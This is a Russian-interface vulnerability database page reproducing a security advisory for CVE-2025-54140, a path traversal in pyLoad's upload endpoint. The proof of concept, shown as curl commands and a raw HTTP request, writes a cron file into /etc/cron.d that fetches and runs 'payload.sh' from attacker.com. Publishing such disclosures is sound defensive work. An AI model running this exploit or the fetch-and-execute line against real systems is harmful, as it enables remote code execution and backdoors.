Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-xqpg-92fq-grfg

Опубликовано: 21 июл. 2025
Источник: github
Github: Прошло ревью
CVSS3: 7.5

Описание

pyLoad has Path Traversal Vulnerability in json/upload Endpoint that allows Arbitrary File Write

Summary

An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:

  • Remote Code Execution (RCE)
  • Local Privilege Escalation
  • System-wide compromise
  • Persistence and backdoors

Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

@json_blueprint.route("/upload", methods=["POST"]) def upload(): dir_path = api.get_config_value("general", "storage_folder") for file in request.files.getlist("file"): file_path = os.path.join(dir_path, "tmp_" + file.filename) file.save(file_path)

Issue: No sanitization or validation on file.filename, allowing traversal via ../../ sequences.

(Proof of Concept)

  1. Clone and install pyLoad from source (pip install pyload-ng):
git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload
  1. Or install via pip (PyPi) in virtualenv:
python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload
  1. Login and obtain session token
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \ -d "username=admin&password=admin"
  1. Create malicious cron payload
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
  1. Upload file with path traversal filename
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \ -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
  1. On the next cron tick, a reverse shell or payload will be triggered.

BurpSuite HTTP Request

POST /json/upload HTTP/1.1 Host: 127.0.0.1:8000 Cookie: session=SESSION_ID_HERE Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e --------------------------d74496d66958873e Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor" Content-Type: application/octet-stream */1 * * * * root curl http://attacker.com/payload.sh | bash --------------------------d74496d66958873e--

Ссылки

Пакеты

Наименование

pyload-ng

pip
Затронутые версииВерсия исправления

= 0.5.0b3.dev89

0.5.0b3.dev90

EPSS

Процентиль: 47%
0.00245
Низкий

7.5 High

CVSS3

CVE ID

CVE-2025-54140

Дефекты

CWE-22

Связанные уязвимости

nvd логотип

CVE-2025-54140

CVSS3: 7.5
nvd
7 месяцев назад

pyLoad is a free and open-source Download Manager written in pure Python. In version 0.5.0b3.dev89, an authenticated path traversal vulnerability exists in the /json/upload endpoint of pyLoad. By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to: Remote Code Execution (RCE), local privilege escalation, system-wide compromise, persistence, and backdoors. This is fixed in version 0.5.0b3.dev90.

debian логотип

CVE-2025-54140

CVSS3: 7.5
debian
7 месяцев назад

pyLoad is a free and open-source Download Manager written in pure Pyth ...

EPSS

Процентиль: 47%
0.00245
Низкий

7.5 High

CVSS3

CVE ID

CVE-2025-54140

Дефекты

CWE-22